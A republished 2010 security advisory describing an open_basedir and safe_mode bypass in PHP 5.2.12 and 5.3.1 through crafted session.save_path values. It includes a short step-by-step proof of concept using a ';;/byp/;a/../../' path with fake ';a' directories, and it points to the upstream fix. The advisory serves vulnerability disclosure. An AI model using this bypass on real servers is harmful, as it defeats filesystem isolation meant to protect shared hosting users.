PHP 5.2.12/5.3.1 safe_mode/open_basedir Bypass

Source: Internet
Author: User
Tags gpg

 [ PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass ]

Credit: Grzegorz Stachowiak
Provided by: SecurityReason.com
Date:
- Written: 31.01.2010
- Public: 11.02.2010

SecurityRisk: Medium
Affected Software:
PHP 5.2.12
PHP 5.3.1

Advisory URL: http://securityreason.com/achievement_securityalert/82
Vendor: http://www.php.net

--- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.

A visitor accessing your web site is assigned a unique id, the so-called
session id. This is either stored in a cookie on the user side or is
propagated in the URL.

session.save_path defines the argument which is passed to the save
handler. If you choose the default files handler, this is the path where
the files are created. Defaults to /tmp. See also session_save_path().

There is an optional N argument to this directive that determines the
number of directory levels your session files will be spread around in.
For example, setting to '5;/tmp' may end up creating a session file and
location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If .
In order to use N you must create all of these directories before use. A
small shell script exists in ext/session to do this, it's called
mod_files.sh. Also note that if N is used and greater than 0 then
automatic garbage collection will not be performed, see a copy of
php.ini for further information. Also, if you use N, be sure to surround
session.save_path in "quotes" because the separator (;) is also used for
comments in php.ini.

---- 1. session.save_path safe mode and open basedir bypass ---
session.save_path can be set via ini_set(), session_save_path()
functions. In session.save_path there should be path where you will save
yours tmp files. But syntax for session.save_path is:

[/PATH]

OR

[N;/PATH]

N - can be also a string (N should be numeric).

EXAMPLES:

1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")

The main problem came when we use multiple ';' character and when we
will create fake directory structure to reduce '../'.

Proof of Concept:
0. Create directories:

/humhum

and

/byp

1. set open_basedir = /byp
2. create test.php
{
session_save_path("/humhum");
session_start();
}
3. php test.php

Warning: session_save_path(): open_basedir restriction in effect.
File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php
on line 3
4. subdir.php
{
mkdir("puf");
mkdir(";a");
}
5. php subdir.php
6. cd puf
7. create byp.php
{

session_save_path(";;/byp/;a/../../humhum");
session_start();

}
8. php byp.php
9. ls /humhum
sess_d905eb71c9ad65ce2a845cdb0fed3016

The main problem is located in session.c. PHP doesn't check, that we
have used next ';' after first. Creating fake directory structure

mkdir ';a'
mkdir '../;a'

we can reduce directory level using '../' .

--- 2. Fix ---
Revision 294272

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/session/session.c?view=log

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/session/session.c?view=log

--- 3. Credit ---
Founded by: Grzegorz Stachowiak
Written by: Maksymilian Arciemowicz
Fixed by : Ilia Alshanetsky

--- 4. Contact ---
Email:
- Grzegorz.Stachowiak
stachowiak [a,t} analogicode (d_0t} pl

- Maksymilian Arciemowicz
cxib {a.t] securityreason [d0_t} com

GPG:

http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

http://securityreason.com/

http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.